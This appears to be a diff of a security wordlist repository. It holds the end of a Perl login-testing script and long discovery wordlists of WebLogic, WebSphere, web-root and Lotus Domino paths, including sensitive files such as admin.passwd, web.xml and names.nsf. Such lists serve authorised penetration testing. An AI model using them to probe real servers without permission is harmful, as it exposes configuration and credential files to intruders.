return ($response->status_line,$content,$response->as_string);
|
||||
}
|
||||
|
||||
sub Login {
|
||||
my ($browser,$url,$username,$password) = @_;
|
||||
my $req = new HTTP::Request("POST" => "$url");
|
||||
|
||||
$req->content_type('application/x-www-form-urlencoded');
|
||||
$req->content('Username='.$username.'&Password='.$password.'&%%ModDate=0000000000000000');
|
||||
my $response = $browser->request($req);
|
||||
|
||||
return ($response->as_string !~ /$authentication_failure/);
|
||||
}
|
||||
|
||||
|
||||
sub Output {
|
||||
my($url,$output) = @_;
|
||||
my $text;
|
||||
|
||||
if ($output !~ /^404/ && $output !~ /^500/) {
|
||||
$text = "$url -> $output\n";
|
||||
my_print($text);
|
||||
}
|
||||
}
|
||||
|
||||
sub my_print {
|
||||
my($arg) = @_;
|
||||
|
||||
print $arg;
|
||||
print LOGFILE $arg if ($logfile);
|
||||
}
|
@ -1,159 +0,0 @@
|
||||
/*.gif
|
||||
/*.gif/
|
||||
/*.html
|
||||
/*.jsp
|
||||
/*.jsp/
|
||||
/*.jws
|
||||
/*.shtml/
|
||||
/AdminCaptureRootCA
|
||||
/AdminClients
|
||||
/AdminConnections
|
||||
/AdminEvents
|
||||
/AdminJDBC
|
||||
/AdminLicense
|
||||
/AdminMain
|
||||
/AdminProps
|
||||
/AdminRealm
|
||||
/AdminThreads
|
||||
/AdminVersion
|
||||
/BizTalkServer
|
||||
/Bootstrap
|
||||
/Certificate
|
||||
/Classpath/
|
||||
/ConsoleHelp/
|
||||
/ConsoleHelp
|
||||
/DefaultWebApp
|
||||
/HTTPClntClose
|
||||
/HTTPClntLogin
|
||||
/HTTPClntRecv
|
||||
/HTTPClntSend
|
||||
/LogfileSearch
|
||||
/LogfileTail
|
||||
/Login.jsp
|
||||
/MANIFEST.MF
|
||||
/META-INF
|
||||
/SimpappServlet
|
||||
/StockServlet
|
||||
/T3AdminMain
|
||||
/UniversityServlet
|
||||
/WEB-INF
|
||||
/WEB-INF./web.xml
|
||||
/WEB-INF/web.xml
|
||||
/WLDummyInitJVMIDs
|
||||
/WebServiceServlet
|
||||
/_tmp_war
|
||||
/_tmp_war_DefaultWebApp
|
||||
/a2e2gp2r2/x.jsp
|
||||
/actions
|
||||
/admin/login.do
|
||||
/applet
|
||||
/applications
|
||||
/authenticatedy
|
||||
/bea_wls_internal/classes/
|
||||
/bea_wls_internal/WebServiceServlet
|
||||
/bea_wls_internal/getior
|
||||
/bea_wls_internal
|
||||
/bea_wls_internal/HTTPClntSend
|
||||
/bea_wls_internal/HTTPClntRecv
|
||||
/bea_wls_internal/iiop/ClientSend
|
||||
/bea_wls_internal/iiop/ClientRecv
|
||||
/bea_wls_internal/iiop/ClientLogin
|
||||
/bea_wls_internal/WLDummyInitJVMIDs
|
||||
/bea_wls_internal/a2e2gp2r2/x.jsp
|
||||
/bea_wls_internal/psquare/x.jsp
|
||||
/bea_wls_internal/iiop/ClientClose
|
||||
/beanManaged
|
||||
/certificate
|
||||
/classes
|
||||
/classes/
|
||||
/com
|
||||
/common
|
||||
/config
|
||||
/console
|
||||
/cookies
|
||||
/default
|
||||
/docs51
|
||||
/domain
|
||||
/drp-exports
|
||||
/drp-publish
|
||||
/dummy
|
||||
/e2ePortalProject/Login.portal
|
||||
/ejb
|
||||
/ejbSimpappServlet
|
||||
/error
|
||||
/examplesWebApp/EJBeanManagedClient.jsp
|
||||
/examplesWebApp/WebservicesEJB.jsp
|
||||
/examplesWebApp/OrderParser.jsp?xmlfile=C:/bea/weblogic81/samples/server/examples/src/examples/xml/orderParser/order.xml
|
||||
/examplesWebApp/index.jsp
|
||||
/examplesWebApp/InteractiveQuery.jsp
|
||||
/examplesWebApp/SessionServlet
|
||||
/fault
|
||||
/file
|
||||
/file/
|
||||
/fileRealm
|
||||
/fileRealm.properties
|
||||
/getior
|
||||
/graphics
|
||||
/helloKona
|
||||
/helloWorld
|
||||
/iiop/ClientClose
|
||||
/iiop/ClientRecv
|
||||
/iiop/ClientLogin
|
||||
/iiop/ClientSend
|
||||
/images
|
||||
/index
|
||||
/index.jsp
|
||||
/internal
|
||||
/jmssender
|
||||
/jmstrader
|
||||
/jspbuild
|
||||
/jwsdir
|
||||
/login.jsp
|
||||
/manifest.mf
|
||||
/mapping
|
||||
/mydomain
|
||||
/myservlet
|
||||
/page
|
||||
/patient/login.do
|
||||
/patient/register.do
|
||||
/phone
|
||||
/physican/login.do
|
||||
/portalAppAdmin/login.jsp
|
||||
/properties
|
||||
/proxy
|
||||
/psquare/x.jsp
|
||||
/public_html
|
||||
/servlet
|
||||
/servletimages
|
||||
/servlets/
|
||||
/session
|
||||
/simpapp
|
||||
/simple
|
||||
/simpleFormServlet
|
||||
/snoop
|
||||
/survey
|
||||
/system
|
||||
/taglib-uri
|
||||
/uddi
|
||||
/uddi/uddilistener
|
||||
/uddiexplorer
|
||||
/uddilistener
|
||||
/utils
|
||||
/web
|
||||
/web.xml
|
||||
/weblogic
|
||||
/weblogic.properties
|
||||
/weblogic.xml
|
||||
/webservice
|
||||
/webshare
|
||||
/wl_management_internal2/FileDistribution
|
||||
/wl_management_internal2/Bootstrap
|
||||
/wl_management_internal2/Admin
|
||||
/wl_management_internal2/wl_management
|
||||
/wl_management_internal1/LogfileTail
|
||||
/wl_management_internal1/LogfileSearch
|
||||
/wl_management_internal1
|
||||
/wl_management
|
||||
/wl_management_internal2
|
||||
/wliconsole
|
||||
/wlserver
|
@ -1,366 +0,0 @@
|
||||
/*
|
||||
/*.do
|
||||
/*.jsp
|
||||
/*.jsv
|
||||
/*.jsw
|
||||
/AddressBookJ2WB
|
||||
/AddressBookJ2WB/*
|
||||
/AddressBookJ2WE/*.jsp
|
||||
/AddressBookJ2WE/*.jsv
|
||||
/AddressBookJ2WE/*.jsw
|
||||
/AddressBookJ2WE/services/AddressBook
|
||||
/AddressBookJ2WE/services/AddressBook/wsdl/*
|
||||
/AddressBookW2JB
|
||||
/AddressBookW2JB/*
|
||||
/AddressBookW2JE/*.jsp
|
||||
/AddressBookW2JE/*.jsv
|
||||
/AddressBookW2JE/*.jsw
|
||||
/AddressBookW2JE/services/AddressBook
|
||||
/AddressBookW2JE/services/AddressBook/wsdl/*
|
||||
/AlbumCatalogWeb
|
||||
/AlbumCatalogWeb/*
|
||||
/AlbumCatalogWeb/docs/*
|
||||
/AlbumCatalogWeb/docsservlet
|
||||
/AlbumCatalogWeb/docsservlet/*
|
||||
/AlbumCatalogWebservlet
|
||||
/AlbumCatalogWebservlet/*
|
||||
/AppInstallStatusServlet
|
||||
/AppManagementStatus
|
||||
/AppServer
|
||||
/ApplicationProfileSample
|
||||
/ApplicationProfileSample/*
|
||||
/ApplicationProfileSample/docs/*
|
||||
/ApplicationProfileSampleservlet
|
||||
/ApplicationProfileSampleservlet/*
|
||||
/BBApp
|
||||
/Bank/*.jsp
|
||||
/Bank/*.jsv
|
||||
/Bank/*.jsw
|
||||
/Bank/services/Transfer_SEI
|
||||
/Bank/services/Transfer_SEI/wsdl
|
||||
/Bank/services/Transfer_SEI/wsdl/*
|
||||
/BeenThere
|
||||
/ClusterRollout
|
||||
/ControllerServlet
|
||||
/DynaCacheESI
|
||||
/DynaCacheESI/esiInavlidator
|
||||
/DynamicQuery/EmployeeFinder
|
||||
/DynamicQuery/EmployeeFinder/*
|
||||
/DynamicQuery/docs/*
|
||||
/ErrorReporter
|
||||
/ErrorServlet
|
||||
/FileTransfer
|
||||
/GalleryMenu
|
||||
/Greenhouse
|
||||
/Greenhouse/*
|
||||
/GreenhouseByWebSphere/docs/*
|
||||
/GreenhouseEJB/*.jsp
|
||||
/GreenhouseEJB/*.jsv
|
||||
/GreenhouseEJB/*.jsw
|
||||
/GreenhouseEJB/services/GreenhouseFront
|
||||
/GreenhouseEJB/services/GreenhouseFront/wsdl/*
|
||||
/GreenhouseWeb
|
||||
/GreenhouseWeb/*
|
||||
/GreenhouseWebservlet
|
||||
/GreenhouseWebservlet/*
|
||||
/Greenhouseservlet
|
||||
/Greenhouseservlet/*
|
||||
/HelloHTML.jsp
|
||||
/HelloHTMLError.jsp
|
||||
/HelloPervasive
|
||||
/HelloVXML.jsp
|
||||
/HelloVXMLError.jsp
|
||||
/HelloWML.jsp
|
||||
/HelloWMLError.jsp
|
||||
/HelloWorld
|
||||
/HelloWorldServlet
|
||||
/HitCount
|
||||
/HitCount.jsp
|
||||
/IBMDefaultErrorReporter
|
||||
/IBMWebAS
|
||||
/JTAExtensionsSamples/TransactionTracker
|
||||
/JTAExtensionsSamples/TransactionTracker/*
|
||||
/JTAExtensionsSamples/docs/*
|
||||
/MANIFEST.MF
|
||||
/META-INF
|
||||
/MessageDrivenBeans/docs/*
|
||||
/MessageDrivenBeans/docsservlet/*
|
||||
/OrderProcessorEJB/*
|
||||
/OrderProcessorEJB/*.jsp
|
||||
/OrderProcessorEJB/*.jsv
|
||||
/OrderProcessorEJB/*.jsw
|
||||
/OrderProcessorEJB/services/FrontGate
|
||||
/OrderProcessorEJB/services/FrontGate/wsdl/*
|
||||
/PlantsByWebSphere
|
||||
/PlantsByWebSphere/*
|
||||
/PlantsByWebSphere/docs
|
||||
/SamplesGallery
|
||||
/SamplesGallery/*
|
||||
/SimpleServlet
|
||||
/SnoopServlet
|
||||
/SourceCodeViewer
|
||||
/Sourceservlet-classViewer
|
||||
/StockQuote/*.jsp
|
||||
/StockQuote/*.jsv
|
||||
/StockQuote/*.jsw
|
||||
/StockQuote/services/xmltoday-delayed-quotes
|
||||
/StockQuote/services/xmltoday-delayed-quotes/wsdl/*
|
||||
/TechnologySamples/AddressBook
|
||||
/TechnologySamples/AddressBook/*
|
||||
/TechnologySamples/AddressBook/*.jsp
|
||||
/TechnologySamples/AddressBook/*.jsv
|
||||
/TechnologySamples/AddressBook/*.jsw
|
||||
/TechnologySamples/AddressBook/AddressBookServlet
|
||||
/TechnologySamples/AddressBook/servlet/*
|
||||
/TechnologySamples/BasicCalculator
|
||||
/TechnologySamples/BasicCalculator/*
|
||||
/TechnologySamples/BulletinBoard
|
||||
/TechnologySamples/BulletinBoard/*
|
||||
/TechnologySamples/BulletinBoardservlet
|
||||
/TechnologySamples/BulletinBoardservlet/*
|
||||
/TechnologySamples/Calendar
|
||||
/TechnologySamples/Calendar/*
|
||||
/TechnologySamples/FilterServlet
|
||||
/TechnologySamples/FilterServlet/*
|
||||
/TechnologySamples/FormLogin
|
||||
/TechnologySamples/FormLogin/*
|
||||
/TechnologySamples/FormLoginservlet
|
||||
/TechnologySamples/FormLoginservlet/*
|
||||
/TechnologySamples/JAASLogin
|
||||
/TechnologySamples/JAASLogin/*
|
||||
/TechnologySamples/JAASLoginservlet
|
||||
/TechnologySamples/JAASLoginservlet/*
|
||||
/TechnologySamples/MovieReview
|
||||
/TechnologySamples/MovieReview/*
|
||||
/TechnologySamples/MovieReview2_0
|
||||
/TechnologySamples/MovieReview2_0/*
|
||||
/TechnologySamples/MovieReview2_1
|
||||
/TechnologySamples/MovieReview2_1/*
|
||||
/TechnologySamples/PageReturner
|
||||
/TechnologySamples/PageReturner/*
|
||||
/TechnologySamples/PageReturnerservlet
|
||||
/TechnologySamples/PageReturnerservlet/*
|
||||
/TechnologySamples/ReadingList
|
||||
/TechnologySamples/ReadingList/*
|
||||
/TechnologySamples/SimpleJSP
|
||||
/TechnologySamples/SimpleJSP/*
|
||||
/TechnologySamples/SimpleServlet
|
||||
/TechnologySamples/SimpleServlet/*
|
||||
/TechnologySamples/Subscription
|
||||
/TechnologySamples/Subscription/*
|
||||
/TechnologySamples/Subscriptionservlet
|
||||
/TechnologySamples/Subscriptionservlet/*
|
||||
/TechnologySamples/Taglib
|
||||
/TechnologySamples/Taglib/*
|
||||
/TechnologySamples/docs
|
||||
/WEB-INF
|
||||
/WEB-INF./web.xml
|
||||
/WEB-INF/web.xml
|
||||
/WSsamples
|
||||
/WSsamples/*
|
||||
/WSsamples/de
|
||||
/WSsamples/de/*
|
||||
/WSsamples/en
|
||||
/WSsamples/en/*
|
||||
/WSsamples/es
|
||||
/WSsamples/es/*
|
||||
/WSsamples/fr
|
||||
/WSsamples/fr/*
|
||||
/WSsamples/index.jsp
|
||||
/WSsamples/it
|
||||
/WSsamples/it/*
|
||||
/WSsamples/ja
|
||||
/WSsamples/ja/*
|
||||
/WSsamples/ko
|
||||
/WSsamples/ko/*
|
||||
/WSsamples/pt_br
|
||||
/WSsamples/pt_br/*
|
||||
/WSsamples/zh_cn
|
||||
/WSsamples/zh_cn/*
|
||||
/WSsamples/zh_tw
|
||||
/WSsamples/zh_tw/*
|
||||
/WarehouseEJB/*.jsp
|
||||
/WarehouseEJB/*.jsv
|
||||
/WarehouseEJB/*.jsw
|
||||
/WarehouseEJB/services/WarehouseFront
|
||||
/WarehouseEJB/services/WarehouseFront/wsdl/*
|
||||
/WarehouseWeb
|
||||
/WarehouseWeb/*
|
||||
/WarehouseWebservlet
|
||||
/WarehouseWebservlet/*
|
||||
/WebServicesSamples/docs/*
|
||||
/WebSphere
|
||||
/WebSphereBank
|
||||
/WebSphereBank/*
|
||||
/WebSphereBank/docs/*
|
||||
/WebSphereBankDeposit
|
||||
/WebSphereBankDeposit/*
|
||||
/WebSphereBankDepositservlet
|
||||
/WebSphereBankDepositservlet/*
|
||||
/WebSphereBankservlet
|
||||
/WebSphereBankservlet/*
|
||||
/WebSphereSamples
|
||||
/WebSphereSamples.Configuration.config
|
||||
/WebSphereSamples/
|
||||
/WebSphereSamples/SingleSamples/AccountAndTransfer/create.html
|
||||
/WebSphereSamples/SingleSamples/Increment/increment.html
|
||||
/WebSphereSamples/YourCo/main.html
|
||||
/_DynaCacheEsi
|
||||
/_DynaCacheEsi/*
|
||||
/_DynaCacheEsi/esiInvalidator
|
||||
/ab/*
|
||||
/ab/docs/*
|
||||
/activitysessions/docs/*
|
||||
/addNodeListener
|
||||
/admin
|
||||
/admin-authz.xml
|
||||
/admin.conf
|
||||
/admin.passwd
|
||||
/admin/*
|
||||
/admin/logon.jsp
|
||||
/admin/secure/logon.jsp
|
||||
/apadminred
|
||||
/apadminred.html
|
||||
/aphtpasswd.html
|
||||
/asynchbeans/*
|
||||
/asynchbeans/docs/*
|
||||
/cachemonitor
|
||||
/cachemonitor/statistics.jsp
|
||||
/cell.xml
|
||||
/cells
|
||||
/cgi-bin
|
||||
/cgi-bin/
|
||||
/com.ibm.ws.console.events
|
||||
/com.ibm.ws.console.events/runtime_messages.jsp
|
||||
/config
|
||||
/console
|
||||
/debug_error.jsp
|
||||
/error
|
||||
/error.jsp
|
||||
/esiInavlidator
|
||||
/estore
|
||||
/estore/annotated-index.html
|
||||
/estore/index.html
|
||||
/estore/populate
|
||||
/examples
|
||||
/hello
|
||||
/helloEJB
|
||||
/hitcount
|
||||
/httpd.conf
|
||||
/i18nctxSample
|
||||
/i18nctxSample/*
|
||||
/i18nctxSample/docs/*
|
||||
/ibm
|
||||
/ibm/console
|
||||
/ibm_security_logout
|
||||
/icons
|
||||
/images
|
||||
/index.html
|
||||
/index.jsp
|
||||
/ivt
|
||||
/ivt/*
|
||||
/ivt/ivtDate.jsp
|
||||
/ivt/ivtejb
|
||||
/ivt/ivtservler
|
||||
/ivt/ivtservlet
|
||||
/ivtejb
|
||||
/ivtserver
|
||||
/ivtservlet
|
||||
/j_security_check
|
||||
/jsp
|
||||
/login.html
|
||||
/manual
|
||||
/manual/index.html
|
||||
/node.xml
|
||||
/nodes
|
||||
/opc/*.jsp
|
||||
/opc/*.jsv
|
||||
/opc/*.jsw
|
||||
/opc/services/BrokerServiceIntfPort
|
||||
/opc/services/BrokerServiceIntfPort/wsdl/*
|
||||
/opc/services/OrderTrackingIntfPort
|
||||
/opc/services/OrderTrackingIntfPort/wsdl/*
|
||||
/opc/services/PurchaseOrderIntfPort
|
||||
/opc/services/PurchaseOrderIntfPort/wsdl/*
|
||||
/opt
|
||||
/petstore
|
||||
/petstore/*
|
||||
/ping
|
||||
/removeNodeListener
|
||||
/resources.xml
|
||||
/runtime_messages.jsp
|
||||
/samples/activitysessions
|
||||
/samples/activitysessions/*
|
||||
/scheduler
|
||||
/scheduler/*
|
||||
/scheduler/docs/*
|
||||
/scripts
|
||||
/secure/downloadFile/*
|
||||
/securecleanup
|
||||
/security.xml
|
||||
/server-info
|
||||
/server-status
|
||||
/server.xml
|
||||
/serverindex.xml
|
||||
/servers
|
||||
/servlet
|
||||
/servlet/*
|
||||
/servlet/ControllerServlet
|
||||
/servlet/ErrorReporter
|
||||
/servlet/HelloWorldServlet
|
||||
/servlet/HitCount
|
||||
/servlet/SimpleServlet
|
||||
/servlet/SnoopServlet
|
||||
/servlet/TheExpiringHTMLServlet
|
||||
/servlet/WebSphereSamples.Configuration.config
|
||||
/servlet/WebSphereSamples.Form.FormServlet
|
||||
/servlet/WebSphereSamples.YourCo.News.NewsServlet
|
||||
/servlet/aphtpassword
|
||||
/servlet/com.ibm.as400ad.webfacing.runtime.httpcontroller.ControllerServlet
|
||||
/servlet/com.ibm.servlet.engine.webapp.DefaultErrorReporter
|
||||
/servlet/com.ibm.servlet.engine.webapp.InvokerServlet
|
||||
/servlet/com.ibm.servlet.engine.webapp.SimpleFileServlet
|
||||
/servlet/com.ibm.servlet.engine.webapp.UncaughtServletException
|
||||
/servlet/com.ibm.servlet.engine.webapp.WebAppErrorReport
|
||||
/servlet/hello
|
||||
/servlet/snoop
|
||||
/servlet/snoop2
|
||||
/servletcache
|
||||
/showCfg
|
||||
/sibstatus
|
||||
/simple.jsp
|
||||
/simpleJSP
|
||||
/snoop
|
||||
/snoop/*
|
||||
/snoop2
|
||||
/statistics.jsp
|
||||
/status
|
||||
/statuspoll
|
||||
/theme
|
||||
/tradetheme
|
||||
/transfer
|
||||
/uddigui/*
|
||||
/uddisoap/*
|
||||
/variables.xml
|
||||
/very_simple.jsp
|
||||
/virtualhosts.xml
|
||||
/wasPerfTool
|
||||
/wasPerfTool/*
|
||||
/wasPerfToolservlet
|
||||
/wasPerfToolservlet/*
|
||||
/web.xml
|
||||
/webapp
|
||||
/webapp/examples/ErrorServlet
|
||||
/webapp/examples/HelloPervasive
|
||||
/webapp/examples/HitCount
|
||||
/webapp/examples/SourceCodeViewer
|
||||
/webapp/examples/login.html
|
||||
/webapp/examples/ping
|
||||
/webapp/examples/showCfg
|
||||
/webapp/examples/showcfg
|
||||
/webapp/examples/simple.jsp
|
||||
/webapp/examples/verify
|
||||
/webexec
|
||||
/workarea/*
|
||||
/workarea/docs/*
|
||||
/
|
@ -28,3 +28,4 @@ tmp
|
||||
~ftp
|
||||
~nobody
|
||||
~root
|
||||
php.ini
|
||||
|
13
Discovery/Web-Content/default-web-root-directory-linux.txt
Normal file
13
Discovery/Web-Content/default-web-root-directory-linux.txt
Normal file
@ -0,0 +1,13 @@
|
||||
/var/www/html/
|
||||
/var/www/
|
||||
/var/www/sites/
|
||||
/var/www/public/
|
||||
/var/www/public_html/
|
||||
/var/www/html/default/
|
||||
/srv/www/
|
||||
/srv/www/html/
|
||||
/srv/www/sites/
|
||||
/home/www/
|
||||
/home/httpd/
|
||||
/home/$USER/public_html/
|
||||
/home/$USER/www/
|
@ -0,0 +1,3 @@
|
||||
c:\inetpub\wwwroot\
|
||||
c:\xampp\htdocs\
|
||||
c:\wamp\www
|
68
Discovery/Web-Content/domino-dirs-coldfusion39.txt
Normal file
68
Discovery/Web-Content/domino-dirs-coldfusion39.txt
Normal file
@ -0,0 +1,68 @@
|
||||
852566c90012664f/
|
||||
852566c90012664f/dblist/
|
||||
adm-bin/
|
||||
archive/
|
||||
cgi-bin/
|
||||
customerdata/
|
||||
dfc/
|
||||
doc/
|
||||
download/
|
||||
download/filesets/
|
||||
help/
|
||||
inotes/
|
||||
mail/
|
||||
mtdata/
|
||||
nntp/
|
||||
openserver/
|
||||
proghelp/
|
||||
quickplace/
|
||||
quickplace/quickplace/
|
||||
quickstart/
|
||||
sametime/
|
||||
sametime/stadmin/
|
||||
sample/
|
||||
servlet/
|
||||
servlet/accesscontrolservlet/
|
||||
servlet/admin/
|
||||
servlet/auth/
|
||||
servlet/auth/admin/
|
||||
servlet/auth/fileupload/
|
||||
servlet/auth/mmapi/
|
||||
servlet/auth/namechange/
|
||||
servlet/auth/policy/
|
||||
servlet/auth/rapfile/
|
||||
servlet/auth/refresh/
|
||||
servlet/auth/scs/
|
||||
servlet/bootstrap/
|
||||
servlet/dominoadminxpathrequestservletjaxp/
|
||||
servlet/dominobootstrapservlet/
|
||||
servlet/dominoconfigurationservlet/
|
||||
servlet/fileupload/
|
||||
servlet/fileuploadservlet/
|
||||
servlet/meeting/
|
||||
servlet/meetingservlet/
|
||||
servlet/mmapi/
|
||||
servlet/mmapiservlet/
|
||||
servlet/namechange/
|
||||
servlet/namechangeservlet/
|
||||
servlet/notescalendarservlet/
|
||||
servlet/policy/
|
||||
servlet/policyservlet/
|
||||
servlet/rapfile/
|
||||
servlet/rapfileservlet/
|
||||
servlet/refresh/
|
||||
servlet/refreshservlet/
|
||||
servlets/
|
||||
servlet/sametimestartupservlet/
|
||||
servlet/schedulertransfer/
|
||||
servlet/scs/
|
||||
servlets/schedulertransfer/
|
||||
servlet/statistics/
|
||||
servlet/statisticsservlet/
|
||||
servlet/stcal/
|
||||
servlet/ststartup/
|
||||
servlet/telephony/
|
||||
servlet/telephonyservlet/
|
||||
servlet/userinfoservlet/
|
||||
stadmin/
|
||||
winnt/
|
328
Discovery/Web-Content/domino-endpoints-coldfusion39.txt
Normal file
328
Discovery/Web-Content/domino-endpoints-coldfusion39.txt
Normal file
@ -0,0 +1,328 @@
|
||||
__852562F3007ABFD6
|
||||
__852562F3007ABFD6.nsf
|
||||
852566C90012664F
|
||||
aadmin.nsf
|
||||
account.nsf
|
||||
accounts.nsf
|
||||
acls.exe
|
||||
activity.nsf
|
||||
admin4.nsf
|
||||
admin5.nsf
|
||||
adminadm0disk.nsf
|
||||
adminadm0plog.nsf
|
||||
adminisist.nsf
|
||||
administrator.nsf
|
||||
admin.nsf
|
||||
a_domlog.nsf
|
||||
agentrunner.nsf
|
||||
alerts.exe
|
||||
alog4.nsf
|
||||
alog.nsf
|
||||
anotes.nsf
|
||||
api
|
||||
billing.nsf
|
||||
bookmark.nsf
|
||||
bookmarks.nsf
|
||||
books.nsf
|
||||
buildinfo.txt
|
||||
busytime.nsf
|
||||
cad.nsf
|
||||
calendar.nsf
|
||||
catalog.nsf
|
||||
cersvr.nsf
|
||||
certa.nsf
|
||||
certlog.nsf
|
||||
certsrv.nsf
|
||||
chatlog.nsf
|
||||
citipaypro.nsf
|
||||
clbusy.nsf
|
||||
cldbdir.nsf
|
||||
clubusy.nsf
|
||||
clusta4.nsf
|
||||
collect4.nsf
|
||||
console.exe
|
||||
contents.nsf
|
||||
cpa.nsf
|
||||
cppfbws.nsf
|
||||
customerdata
|
||||
customerdata.nsf
|
||||
da.nsf
|
||||
database.nsf
|
||||
dba4.nsf
|
||||
dbdirman.nsf
|
||||
dblist
|
||||
db.nsf
|
||||
dclf.nsf
|
||||
ddm.nsf
|
||||
deasappdesign.nsf
|
||||
deaslog01.nsf
|
||||
deaslog02.nsf
|
||||
deaslog03.nsf
|
||||
deaslog04.nsf
|
||||
deaslog05.nsf
|
||||
deaslog.nsf
|
||||
decsadm.nsf
|
||||
decsdoc6.nsf
|
||||
decsdoc.nsf
|
||||
decslog.nsf
|
||||
deesadmin.nsf
|
||||
default.htm
|
||||
$defaultnav
|
||||
default.nsf
|
||||
deslog.nsf
|
||||
dfc100.nsf
|
||||
dic.nsf
|
||||
diiop_ior.txt
|
||||
dirassist.nsf
|
||||
dircat.nsf
|
||||
docdomguide.nsf
|
||||
doladmin.nsf
|
||||
dols_help.nsf
|
||||
domadmin.nsf
|
||||
domcfg.nsf
|
||||
domchange.nsf
|
||||
domguide.nsf
|
||||
domino.nsf
|
||||
domlog.nsf
|
||||
dpicfg.nsf
|
||||
dspug.nsf
|
||||
dspv.ntf
|
||||
event.nsf
|
||||
events4.nsf
|
||||
events5.nsf
|
||||
events.nsf
|
||||
faqw46
|
||||
faqw46.nsf
|
||||
forms5.nsf
|
||||
forms6.nsf
|
||||
forms7.nsf
|
||||
forms8.nsf
|
||||
forms9.nsf
|
||||
framew46
|
||||
framew46.nsf
|
||||
group.nsf
|
||||
groups.nsf
|
||||
help4.nsf
|
||||
help5_admin.nsf
|
||||
help5_client.nsf
|
||||
help5_designer.nsf
|
||||
help65_admin.nsf
|
||||
help65_client.nsf
|
||||
help65_designer.nsf
|
||||
help65_iwa_en.nsf
|
||||
help6_admin.nsf
|
||||
help6_client.nsf
|
||||
help6_designer.nsf
|
||||
help70_iwa_en.nsf
|
||||
help7_admin.nsf
|
||||
help7_client.nsf
|
||||
help7_designer.nsf
|
||||
help80_iwa_en.nsf
|
||||
help8_admin.nsf
|
||||
help8_client.nsf
|
||||
help8_designer.nsf
|
||||
help9_admin.nsf
|
||||
help9_client.nsf
|
||||
help9_designer.nsf
|
||||
helpadmin.nsf
|
||||
helpadmn.nsf
|
||||
helpdomguide.nsf
|
||||
helpdspug.nsf
|
||||
helphelp4.nsf
|
||||
helphelpadmin.nsf
|
||||
helphelplt4.nsf
|
||||
helpinternet.nsf
|
||||
helpjavapg.nsf
|
||||
helplccon.nsf
|
||||
helplt4.nsf
|
||||
helpmigrate.nsf
|
||||
helpnpn_admn.nsf
|
||||
helpnpn_rn.nsf
|
||||
helpreadmec.nsf
|
||||
helpreadmes.nsf
|
||||
helpsmhelp.nsf
|
||||
helpsrvinst.nsf
|
||||
hidden.nsf
|
||||
home.nsf
|
||||
homepage.nsf
|
||||
hostaddress.xml
|
||||
inotesforms5.nsf
|
||||
installa.nsf
|
||||
internet.nsf
|
||||
ispy50.nsf
|
||||
javapg.nsf
|
||||
jotter.nsf
|
||||
kbccv11.nsf
|
||||
kbnv11.nsf
|
||||
kbssv11.nsf
|
||||
kbssvv11.nsf
|
||||
lccon6.nsf
|
||||
lccon.nsf
|
||||
lcon.nsf
|
||||
ldap.nsf
|
||||
l_domlog.nsf
|
||||
leiadm.nsf
|
||||
leilog.nsf
|
||||
leivlt.nsf
|
||||
listdb.exe
|
||||
l_lotus_script.inf
|
||||
lndfr.nsf
|
||||
lndsutr.nsf
|
||||
log4a.nsf
|
||||
loga4.nsf
|
||||
loggingerror.jsp
|
||||
loggingmeetingdetails.jsp
|
||||
loggingviewselection.jsp
|
||||
loggingviewtable.jsp
|
||||
log.nsf
|
||||
lotustraveler.nsf
|
||||
l_search.inf
|
||||
lsxlc6.nsf
|
||||
lsxlc.nsf
|
||||
mab45.ntf
|
||||
mab.nsf
|
||||
mail10.box
|
||||
mail1.box
|
||||
mail2.box
|
||||
mail3.box
|
||||
mail4.box
|
||||
mail5.box
|
||||
mail6.box
|
||||
mail7.box
|
||||
mail8.box
|
||||
mail9.box
|
||||
mailadmin.nsf
|
||||
mail.box
|
||||
mailbox.nsf
|
||||
mailw46.nsf
|
||||
main.nsf
|
||||
migrate.nsf
|
||||
monitoringviewgeneralserverstatus.jsp
|
||||
monitoringviewmeetingsandparticipants.jsp
|
||||
monitoringviewoverview.jsp
|
||||
monitoringviewselection.jsp
|
||||
monitoringviewtoolsinmeetings.jsp
|
||||
monitoringviewtotallogins.jsp
|
||||
msdwda.nsf
|
||||
mtabtbls.nsf
|
||||
mtatbls.nsf
|
||||
mtstore.nsf
|
||||
namagent.nsf
|
||||
names.nsf
|
||||
nd000000.nsf
|
||||
nd000001.nsf
|
||||
nd000002.nsf
|
||||
nd000003.nsf
|
||||
nd000004.nsf
|
||||
n_lotus_script.inf
|
||||
nntppost.nsf
|
||||
nombre_usuario.nsf
|
||||
notes.ini
|
||||
notes.nsf
|
||||
npn_admn.nsf
|
||||
npn_rn.nsf
|
||||
n_search.inf
|
||||
ntsync45.nsf
|
||||
ntsync4.nsf
|
||||
pagesw46
|
||||
pagesw46.nsf
|
||||
patrol41.nsf
|
||||
perweb.nsf
|
||||
private.nsf
|
||||
products.nsf
|
||||
public.nsf
|
||||
puserinfo.nsf
|
||||
pwdresetsample.nsf
|
||||
pxp.nsf
|
||||
qpadmin.nsf
|
||||
qstart50.nsf
|
||||
qstart.nsf
|
||||
readmec.nsf
|
||||
readme.nsf
|
||||
readmes.nsf
|
||||
reginfo.nsf
|
||||
reports.nsf
|
||||
resource.nsf
|
||||
resrc7.nsf
|
||||
saws2.nsf
|
||||
saws.nsf
|
||||
schedulertr.nsf
|
||||
schema50.nsf
|
||||
schema.nsf
|
||||
secret.nsf
|
||||
secure.nsf
|
||||
setup.nsf
|
||||
setupweb.nsf
|
||||
siregw46
|
||||
siregw46.nsf
|
||||
site1w4646
|
||||
site1w46.nsf
|
||||
site2w4646
|
||||
site2w46.nsf
|
||||
site3w4646
|
||||
site3w46.nsf
|
||||
smbcfg.nsf
|
||||
smconf.nsf
|
||||
smency.nsf
|
||||
smhelp.nsf
|
||||
smmsg.nsf
|
||||
smquar.nsf
|
||||
smsolar.nsf
|
||||
smtime.nsf
|
||||
smtp.box
|
||||
smtpibwq.nsf
|
||||
smtp.nsf
|
||||
smtpobwq.nsf
|
||||
smtptbls.nsf
|
||||
smvlog.nsf
|
||||
software.nsf
|
||||
srvinst.nsf
|
||||
srvnam.htm
|
||||
srvnam.nsf
|
||||
stadmin
|
||||
stadminact.exe
|
||||
stadmin.nsf
|
||||
statauths.nsf
|
||||
statautht.nsf
|
||||
statmail.nsf
|
||||
statrep.nsf
|
||||
stats217.nsf
|
||||
stats521.nsf
|
||||
stats572.nsf
|
||||
stats675.nsf
|
||||
stats988.nsf
|
||||
stauths.nsf
|
||||
stautht.nsf
|
||||
stcenter.nsf
|
||||
stconfig.nsf
|
||||
stconf.nsf
|
||||
stcs.nsf
|
||||
stdnaset.nsf
|
||||
